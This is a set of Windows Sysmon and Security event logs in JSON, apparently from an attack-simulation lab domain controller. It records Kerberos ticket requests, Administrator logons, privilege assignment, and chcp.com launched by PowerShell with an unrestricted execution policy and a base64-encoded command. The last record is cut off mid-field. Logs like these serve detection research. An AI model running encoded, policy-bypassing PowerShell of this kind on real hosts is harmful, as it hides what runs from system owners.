{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4846,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220563,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-1117747729-287425051-3091891954-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220564,"ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-881393$\r\n\tService ID:\t\tS-1-5-21-1117747729-287425051-3091891954-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-881393$","ServiceSid":"S-1-5-21-1117747729-287425051-3091891954-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220565,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220566,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-881393$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B258\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{033CEA9D-C85B-510A-E7F6-EF589B00EB10}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x534\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-881393\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-881393$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7b258","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-881393","LogonGuid":"{033CEA9D-C85B-510A-E7F6-EF589B00EB10}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220567,"ActivityID":"{16791790-67C7-0001-9217-7916C767D601}","ProcessID":864,"ThreadID":2800,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-1117747729-287425051-3091891954-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7B258\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-1117747729-287425051-3091891954-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7b258","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4847,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4848,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.031\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-001001540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 2800\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {A837DB8D-01B5-5F25-0000-0010FACE0000}\r\nTargetProcessId: 1332\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.031","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-001001540000}","SourceProcessId":"864","SourceThreadId":"2800","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{A837DB8D-01B5-5F25-0000-0010FACE0000}","TargetProcessId":"1332","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:36","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:36","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4849,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:36.043\r\nProcessGuid: {A837DB8D-0324-5F25-0000-001080B20700}\r\nProcessId: 4680\r\nImage: C:\\Windows\\System32\\chcp.com\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Change CodePage Utility\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CHCP.COM\r\nCommandLine: \"C:\\Windows\\system32\\chcp.com\" 65001\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD\r\nParentProcessGuid: {A837DB8D-0323-5F25-0000-001016A60700}\r\nParentProcessId: 3396\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:36.043","ProcessGuid":"{A837DB8D-0324-5F25-0000-001080B20700}","Image":"C:\\Windows\\System32\\chcp.com","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Change CodePage Utility","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"CHCP.COM","CommandLine":"\"C:\\Windows\\system32\\chcp.com\" 65001","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD","ParentProcessGuid":"{A837DB8D-0323-5F25-0000-001016A60700}","ParentProcessId":"3396","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 